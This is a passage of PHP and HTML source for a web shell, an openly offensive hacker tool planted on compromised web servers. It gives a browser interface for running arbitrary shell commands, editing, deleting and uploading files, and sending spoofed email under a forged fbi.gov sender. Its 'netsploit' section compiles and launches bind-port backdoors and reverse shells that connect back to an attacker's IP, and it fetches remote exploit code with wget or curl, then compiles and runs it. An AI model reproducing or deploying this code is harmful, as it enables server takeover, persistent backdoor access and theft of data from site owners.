ame</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser
" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="w
idth:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td><
/tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz"
type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class=
"inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </
form> <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){ if(isset($_P
OST['mail_send'])){ $mail_to = $_POST['mail_to']; $mail_from = $_POST['mail_from
']; $mail_subject = $_POST['mail_subject']; $mail_content = magicboom($_POST['ma
il_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
{ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form
action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post"> <table class="cmdbox"
> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:3
40px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td>&nbsp;<input class
="inputz" style="width:20%;" type="text" value="Bobyhikaru@indohackerlink.com" n
ame="mail_to" />&nbsp; mail to</td></tr> <tr><td>&nbsp;<input class="inputz" sty
le="width:20%;" type="text" value="Bobyhikaru@fbi.gov" name="mail_from" />&nbsp;
from</td></tr> <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="tex
t" value="patch me" name="mail_subject" />&nbsp; subject</td></tr> <tr><td>&nbsp
;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="ma

il_send" /></td></tr></form> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?>

</td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == '
phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_en
d_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); e
cho "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elsei
f(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if
(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@po
six_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $own
er = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $o
wner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px
;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_
link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"pos
t\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;paddin
g:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"marg
in:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\
" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"subm
it\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submi
t\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link
','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".
ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></
tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".dat
e("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".dat
e("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".dat
e("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?
y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($fil
n)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;d
elete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<
a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a
href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;vie
w=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&
amp;type=image\">image</a></td></tr> </table> "; if(isset($_GET['type']) && ($_G
ET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img s
rc=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && (
$_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file
_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } els
e { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents
($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,
$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_
POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']
); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite(
$filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else
$msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; }
if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $conten
t = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fget
s($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&amp;ed
it=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="
2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea>
<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="
inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>
" /><input class="inputzbut" type="submit" value="Save !" name="save" style="wid
th:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(
isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){
if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['pa
th']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']
; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($s
tat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname
"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl']))
{ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $path = magi
cboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$na
mafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg =

"failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&amp;x=up

load" enctype="multipart/form-data" method="post"> <table class="tabnet" style="
width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr>
<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;"
type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbu
t" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="tex
t" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /><
/td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding
:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><for
m method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;
x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wu
rl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr>
<td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path"
value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz
" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx
</option> <option value="wfread">fread</option> <option value="wfetch">fetch</op
tion> <option value="wlinks">links</option> <option value="wget">GET</option> <o
ption value="wcurl">curl</option> </select></td><td colspan="2"><input type="sub
mit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></t
r></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"
><?php echo $msg; ?></div> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'n
etsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POS
T['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $pass
wrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc
bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwr
d." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Proces
s found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process
not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_PO
ST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST[
'use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_
pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl");
exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$s
can)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } el
se { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"
; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty(
$_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = tri
m($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c");
exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg =
"Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[
'backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['u
se'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); t
ulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp
".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port."
..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty
($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wur
l']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe(
$wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabn
et"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr
> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=ne
tsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" siz
e="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><inpu
t class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindp
ort_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><sele
ct class="inputz" size="1" name="use"><option value="Perl">Perl</option><option
value="C">C</option></select> <input class="inputzbut" type="submit" name="bind"
value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table>
<form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit"> <tr><td>IP
</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo
((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("")); ?>"></td><
/tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size

="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="tex

t-align:justify"><p><select size="1" class="inputz" name="use"><option value="Pe
rl">Perl</option><option value="C">C</option></select> <input type="submit" name
="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></fo
rm> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd;
?>&amp;x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name
="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td
>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;"
value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr
><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget<
/option> <option value="wlynx">lynx</option> <option value="wfread">fread</optio
n> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <
option value="wget">GET</option> <option value="wcurl">curl</option> </select></
td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" valu
e="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div
style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(
isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $p
wd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <
textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @e
xe($_POST['cmd']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><i
nput onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd"
style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !
" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else
{ if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete'
]; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != ""))
{ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkd
ir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); }
$buff = showdir($pwd,$prompt); echo $buff; } ?> </div> </body> </html>

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